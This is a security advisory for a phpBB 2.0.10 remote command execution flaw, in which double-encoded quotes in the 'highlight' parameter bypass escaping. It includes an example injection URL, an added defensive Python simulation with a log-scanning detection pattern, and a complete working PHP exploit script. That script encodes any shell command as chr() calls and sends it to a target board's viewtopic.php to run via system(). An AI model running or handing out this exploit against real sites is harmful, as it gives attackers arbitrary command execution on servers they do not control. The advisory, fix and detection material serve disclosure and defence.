"phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package". Inadequate UTF-8 character escaping causes an arbitrary command execution vulnerability in phpBB.
Credit:
The information has been provided by jessica soules.
Exploit code by pokleyzz.
Vulnerable Systems:
* phpBB version 2.0.10 and prior
* The issue may affect PNphpbb and other products based on phpBB.

Immune Systems:
* phpBB Version 2.0.11
Because of the way urldecode and magic quotes work together, %2527 is turned into %27, which is the encoded form of a single quote, and that quote is left unslashed. This gives you a SQL injection, leading to an arbitrary PHP exec hole.
Example:
http://www.example.com/viewtopic.php?t=1&highlight=%2527
Will result in the following error message:
Parse error: parse error, unexpected T_STRING in viewtopic.php(1109) : regexp code on line 1
Fatal error: Failed evaluating code: preg_replace('#\b(')\b#i', '\1', '>POST TEXT HERE<') in viewtopic.php on line 1109
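To make the escaping-order problem concrete from the defender's side, here is an added Python example (not from the advisory, and not phpBB's code) that mimics PHP's magic_quotes_gpc (addslashes) and a second urldecode() in the order the advisory describes, shows why a single-encoded quote is slashed while a double-encoded one is not, and then scans constructed access-log lines for a double-encoded quote in the highlight parameter. The fixed_highlight function is an assumed illustration of "finish decoding, then escape once", not phpBB 2.0.11's actual patch; the log lines and addresses are constructed.

```python
# Added example, not part of the advisory or of phpBB: simulates the
# escape-before-decode ordering behind the %2527 bypass and scans access-log
# lines for that pattern. addslashes() mimics PHP's magic_quotes_gpc;
# fixed_highlight() is an assumed hardening, not phpBB 2.0.11's real patch.
import re
from urllib.parse import unquote


def addslashes(s):
    """Mimic PHP addslashes(): backslash-escape \\, ' and " (what magic_quotes_gpc did to GET data)."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def php_get_value(raw_query_value, magic_quotes=True):
    """Value as $HTTP_GET_VARS['highlight'] would hold it: the request layer
    decodes the query string once, then magic_quotes escapes only the quotes
    visible at that moment. %2527 decodes to %27, which has no quote to escape."""
    once = unquote(raw_query_value)
    return addslashes(once) if magic_quotes else once


def vulnerable_highlight(raw_query_value):
    """phpBB 2.0.10 style: urldecode() the already-decoded, already-escaped
    value. A quote hidden behind the second encoding layer comes out unslashed."""
    return unquote(php_get_value(raw_query_value))


def fixed_highlight(raw_query_value):
    """Assumed hardening for the demo: finish all decoding first, then escape
    once, so no later step can re-create a quote behind the escaping."""
    fully_decoded = unquote(php_get_value(raw_query_value, magic_quotes=False))
    return addslashes(fully_decoded)


def contains_unescaped_quote(value):
    """True if a ' or " is not preceded by a backslash, i.e. it would reach the query or eval intact."""
    return re.search(r"(?<!\\)['\"]", value) is not None


# Detection side: a highlight parameter carrying a double-encoded ' (%2527) or " (%2522).
DOUBLE_ENCODED_QUOTE = re.compile(r"[?&]highlight=[^&\s\"]*%25(?:27|22)", re.IGNORECASE)

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [15/Nov/2004:04:04:00 +0000] "GET /viewtopic.php?t=1&highlight=phpbb HTTP/1.1" 200 8123',
    '203.0.113.5 - - [15/Nov/2004:04:05:12 +0000] "GET /viewtopic.php?t=1&highlight=%2527 HTTP/1.1" 200 512',
    '198.51.100.9 - - [15/Nov/2004:04:06:40 +0000] "GET /viewtopic.php?t=7&highlight=%27quoted%27 HTTP/1.1" 200 9001',
]


def suspicious_requests(log_lines):
    """Return the log lines whose highlight parameter carries a double-encoded quote."""
    return [line for line in log_lines if DOUBLE_ENCODED_QUOTE.search(line)]


if __name__ == "__main__":
    for raw in ("%27", "%2527"):
        print("raw=%r vulnerable=%r fixed=%r"
              % (raw, vulnerable_highlight(raw), fixed_highlight(raw)))
    for line in suspicious_requests(SAMPLE_ACCESS_LOG):
        print("double-encoded quote in highlight:", line)
```

The single-encoded %27 is slashed by magic_quotes and stays harmless even after the second urldecode; %2527 passes magic_quotes untouched because it holds no quote yet, and only the later urldecode produces the bare quote. On a 2.0.10 board that has not yet been upgraded, the log scan gives a cheap way to find requests that match the advisory's pattern.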
Vendor Status:
The issue has been fixed in phpBB version 2.0.11 and newer.
Temporary fix:
A temporary fix can be found at: http://www.phpbb.com/phpBB/viewtopic.php?t=240513
Exploit Code:
#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
#
# Requirement:
#
# PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/
if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}
if (isset($argv[2])) {
    $url = $argv[1];
    $command = $argv[2];
}
else {
    echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
    echo "\tURL\t URL to phpBB site (ex: http://127.0.0.1/html)\n";
    echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
    echo "\ttopic_id\t topic id\n";
    echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
    exit;
}
// Optional arguments: topic id defaults to 1, proxy defaults to none.
$topic = isset($argv[3]) ? $argv[3] : 1;
$proxy = isset($argv[4]) ? $argv[4] : '';
// The command string is rewritten as chr() calls joined by double-encoded dots.
$cmd = str2chr($command);
$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch = curl_init();
if ($proxy) {
    curl_setopt($ch, CURLOPT_PROXY, $proxy);
}
curl_setopt($ch, CURLOPT_URL, $url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
curl_close($ch);
echo $res;

// Build "chr(n)%252echr(n)..." from each byte of $str; $chr is initialised so
// the string concatenation does not start from an undefined variable.
function str2chr($str) {
    $chr = '';
    for ($i = 0; $i < strlen($str); $i++) {
        $chr .= "chr(".ord($str[$i]).")";
        if ($i != strlen($str) - 1)
            $chr .= "%252e";
    }
    return $chr;
}
?>